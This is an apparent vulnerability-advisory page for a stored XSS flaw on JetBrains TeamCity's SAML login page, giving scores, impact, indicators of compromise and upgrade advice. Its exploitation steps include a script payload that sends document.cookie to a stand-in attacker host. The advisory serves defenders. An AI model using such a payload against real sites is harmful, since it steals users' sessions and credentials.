CVE-2026-49381
JetBrains TeamCity vulnerability analysis and mitigation

Overview

CVE-2026-49381 is a stored cross-site scripting (XSS) vulnerability in JetBrains TeamCity affecting all versions before 2026.1. The flaw exists on the SAML login page, allowing authenticated attackers with high privileges to inject persistent malicious scripts that execute in other users' browsers. It was published on May 29, 2026, with a patch available in TeamCity 2026.1. The CVSS v3.1 base score is 4.8 (Medium) per NVD, though the GitHub Advisory Database and ENISA rate it as 3.4 (Low) (GitHub Advisory, JetBrains).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a stored XSS variant. An attacker with high-privilege access can inject malicious script content into SAML-related configuration or input fields on the TeamCity SAML login page; this content is then persisted server-side and rendered unsanitized in the browsers of other users who visit the login page. Exploitation requires network access, low attack complexity, high privileges, and user interaction (a victim must load the affected page) (GitHub Advisory, JetBrains).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who visit the SAML login page, potentially leading to session cookie theft, credential harvesting, or unauthorized actions performed on behalf of victims. The confidentiality and integrity impacts are rated as low, with no availability impact, and the scope is changed (affecting users beyond the attacker's own session). In a CI/CD environment like TeamCity, session hijacking of developer or administrator accounts could facilitate supply chain compromise or unauthorized pipeline manipulation (GitHub Advisory).

Exploitation steps

  1. Gain high-privilege access: Obtain administrative or high-privilege credentials to the target JetBrains TeamCity instance (e.g., through credential theft, phishing, or reuse of compromised accounts).
  2. Navigate to SAML configuration: Access the SAML authentication settings or the SAML login page configuration within the TeamCity administration panel.
  3. Inject malicious payload: Insert a stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a SAML-related input field that is rendered on the login page without proper sanitization.
  4. Persist the payload: Save the configuration so the malicious script is stored server-side and will be rendered each time the SAML login page is loaded.
  5. Wait for victim interaction: When a legitimate user (e.g., another administrator or developer) visits the SAML login page, the injected script executes in their browser.
  6. Harvest session data: The script exfiltrates session cookies or performs actions on behalf of the victim, potentially granting the attacker access to additional accounts or pipeline resources (GitHub Advisory).

Indicators of compromise

  • Logs: Unexpected or unauthorized changes to SAML configuration in TeamCity audit logs; access log entries showing unusual script-like content in SAML-related request parameters.
  • Network: Outbound HTTP/S requests from user browsers to unknown external domains shortly after loading the TeamCity SAML login page; DNS queries to attacker-controlled domains originating from client machines that visited the login page.
  • Application: Presence of JavaScript payloads (e.g., <script> tags, encoded script content) in stored SAML configuration fields within the TeamCity database or admin UI.
  • Browser: Unexpected redirects or resource loads to external URLs when accessing the TeamCity SAML login page.

Mitigation and workarounds

The primary remediation is to upgrade JetBrains TeamCity to version 2026.1 or later, which contains the fix for this vulnerability (JetBrains, GitHub Advisory). As interim mitigations, restrict access to the SAML login page and SAML configuration to authorized users and trusted networks only. Implementing Content Security Policy (CSP) headers can reduce the risk of script execution even if a payload is injected. Monitor TeamCity audit logs for unauthorized changes to SAML settings.

Additional resources


SourceThis report was generated using AI

Related JetBrains TeamCity vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-59793HIGH8.8
  • JetBrains TeamCity logoJetBrains TeamCity
  • cpe:2.3:a:jetbrains:teamcity
NoYesJul 10, 2026
CVE-2026-59796HIGH8.1
  • JetBrains TeamCity logoJetBrains TeamCity
  • cpe:2.3:a:jetbrains:teamcity
NoYesJul 10, 2026
CVE-2026-59795MEDIUM6.1
  • JetBrains TeamCity logoJetBrains TeamCity
  • cpe:2.3:a:jetbrains:teamcity
NoYesJul 10, 2026
CVE-2026-59794MEDIUM5.4
  • JetBrains TeamCity logoJetBrains TeamCity
  • cpe:2.3:a:jetbrains:teamcity
NoYesJul 10, 2026
CVE-2026-49381MEDIUM4.8
  • JetBrains TeamCity logoJetBrains TeamCity
  • cpe:2.3:a:jetbrains:teamcity
NoYesMay 29, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management